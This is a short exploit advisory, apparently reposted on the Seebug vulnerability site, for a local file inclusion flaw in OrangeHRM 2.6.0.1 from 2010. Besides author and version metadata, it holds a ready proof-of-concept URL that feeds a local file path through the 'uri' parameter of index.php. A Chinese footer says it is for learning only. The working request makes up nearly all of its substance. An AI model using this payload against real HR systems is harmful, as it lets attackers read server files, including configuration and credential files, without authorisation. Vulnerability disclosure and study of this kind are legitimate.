# Exploit Title: OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability # Date: 11-10-2010 # Author: ZonTa -[ LkHackerZ ]- # Mail: zontahackers[at]gmail[dot]com # Software Link: http://www.orangehrm.com/product-download.php?type=stable-zip http://sourceforge.net/projects/orangehrm/files/stable/2.6/orangehrm-2.6.0.1.zip/download # Version: 2.6.0.1 # Tested on: Apache,PHP5 ------------------------------------------------------------------------------------------------------------------- POC http://localhost/orangehrm/index.php?uniqcode=KPI&menu_no_top=performance&uri=[local-file] ---------------------------------------------------- END ----------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论